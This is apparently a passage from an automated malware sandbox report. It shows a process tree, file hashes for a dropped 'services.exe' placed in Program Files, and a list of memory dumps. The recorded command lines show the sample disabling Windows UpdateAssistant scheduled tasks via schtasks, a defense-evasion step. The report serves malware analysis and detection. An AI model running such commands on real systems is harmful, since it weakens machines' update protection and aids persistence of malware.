            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        [3] C:\Windows\System32\conhost.exe  cmdline: C:\Windows\System32\conhost.exe
            [4] C:\Windows\System32\conhost.exe  cmdline: "C:\Windows\System32\conhost.exe" "dycqfudelnyzo"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Windows\services.exe
  Filesize: 2.0MB
  MD5: 79dbc1a54d33366681f1e926d565cad4
  SHA1: 907cf0ec6784bf140f9759d6931d3697da0fc229
  SHA256: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
  SHA512: 6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
- C:\Program Files\Windows\services.exe
  Filesize: 2.0MB
  MD5: 79dbc1a54d33366681f1e926d565cad4
  SHA1: 907cf0ec6784bf140f9759d6931d3697da0fc229
  SHA256: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
  SHA512: 6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  Filesize: 539B
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
Memory dumps
- memory/624-385-0x0000000000000000-mapping.dmp
- memory/952-361-0x0000000000000000-mapping.dmp
- memory/1012-370-0x0000000000000000-mapping.dmp
- memory/1088-268-0x0000025CD79E0000-0x0000025CD79EA000-memory.dmp (Filesize 40KB)
- memory/1088-235-0x0000025CD7BD0000-0x0000025CD7C89000-memory.dmp (Filesize 740KB)
- memory/1088-229-0x0000025CD79F0000-0x0000025CD7A0C000-memory.dmp (Filesize 112KB)
- memory/1088-211-0x0000000000000000-mapping.dmp
- memory/1312-360-0x0000000000000000-mapping.dmp
- memory/1648-172-0x0000000000000000-mapping.dmp
- memory/1804-382-0x0000000000000000-mapping.dmp
- memory/2136-179-0x0000000000000000-mapping.dmp
- memory/2160-176-0x0000000000000000-mapping.dmp
- memory/2244-363-0x0000000000000000-mapping.dmp
- memory/2784-169-0x0000000000000000-mapping.dmp
- memory/2792-181-0x0000000000000000-mapping.dmp
- memory/2900-369-0x0000000000000000-mapping.dmp
- memory/2952-128-0x0000000000000000-mapping.dmp
- memory/3052-173-0x0000000000000000-mapping.dmp
- memory/3172-186-0x0000000000000000-mapping.dmp
- memory/3176-391-0x0000000000000000-mapping.dmp
- memory/3236-192-0x0000000000000000-mapping.dmp
- memory/3348-185-0x0000000000000000-mapping.dmp
- memory/3372-401-0x0000019D2DC30000-0x0000019D2DC37000-memory.dmp (Filesize 28KB)
- memory/3372-398-0x0000019D2DFC0000-0x0000019D2DFC6000-memory.dmp (Filesize 24KB)
- memory/3380-189-0x0000000000000000-mapping.dmp
- memory/3456-174-0x0000000000000000-mapping.dmp
- memory/3460-381-0x00000243655E0000-0x00000243655F2000-memory.dmp (Filesize 72KB)
- memory/3460-373-0x000002434CC50000-0x000002434CC56000-memory.dmp (Filesize 24KB)
- memory/3472-170-0x0000000000000000-mapping.dmp
- memory/3472-371-0x0000000000000000-mapping.dmp
- memory/3476-193-0x0000000000000000-mapping.dmp
- memory/3560-386-0x0000000000000000-mapping.dmp
- memory/3692-180-0x0000000000000000-mapping.dmp
- memory/3796-388-0x0000000000000000-mapping.dmp
- memory/3816-195-0x0000000000000000-mapping.dmp
- memory/3868-390-0x0000000000000000-mapping.dmp
- memory/4032-366-0x0000000000000000-mapping.dmp
- memory/4288-191-0x0000000000000000-mapping.dmp
- memory/4320-380-0x0000000000000000-mapping.dmp
- memory/4484-182-0x0000000000000000-mapping.dmp
- memory/4492-194-0x0000000000000000-mapping.dmp
- memory/4508-368-0x0000000000000000-mapping.dmp
- memory/4580-184-0x0000000000000000-mapping.dmp
- memory/4628-197-0x0000000000000000-mapping.dmp
- memory/4656-210-0x0000000000000000-mapping.dmp
- memory/4700-141-0x0000010F52690000-0x0000010F5286D000-memory.dmp (Filesize 1.9MB)
- memory/4700-121-0x0000010F6D000000-0x0000010F6D1DC000-memory.dmp (Filesize 1.9MB)
- memory/4736-140-0x000002007BD10000-0x000002007BD86000-memory.dmp (Filesize 472KB)
- memory/4736-135-0x0000020079A30000-0x0000020079A52000-memory.dmp (Filesize 136KB)
- memory/4736-129-0x0000000000000000-mapping.dmp
- memory/4740-367-0x0000000000000000-mapping.dmp
- memory/4776-175-0x0000000000000000-mapping.dmp
- memory/4784-362-0x0000000000000000-mapping.dmp
- memory/4792-387-0x0000000000000000-mapping.dmp
- memory/4824-364-0x0000000000000000-mapping.dmp
- memory/4836-365-0x0000000000000000-mapping.dmp
- memory/4844-375-0x0000000000401BEA-mapping.dmp
- memory/4844-379-0x0000000000400000-0x000000000040C000-memory.dmp (Filesize 48KB)
- memory/4844-374-0x0000000000400000-0x000000000040C000-memory.dmp (Filesize 48KB)
- memory/4848-171-0x0000000000000000-mapping.dmp
- memory/4848-372-0x0000000000000000-mapping.dmp
- memory/4896-183-0x0000000000000000-mapping.dmp
- memory/4896-389-0x0000000000000000-mapping.dmp
- memory/4932-190-0x0000000000000000-mapping.dmp
- memory/4948-177-0x0000000000000000-mapping.dmp
- memory/4952-383-0x0000000000000000-mapping.dmp
- memory/5012-188-0x0000000000000000-mapping.dmp
- memory/5020-187-0x0000000000000000-mapping.dmp
- memory/5064-178-0x0000000000000000-mapping.dmp
- memory/5068-384-0x0000000000000000-mapping.dmp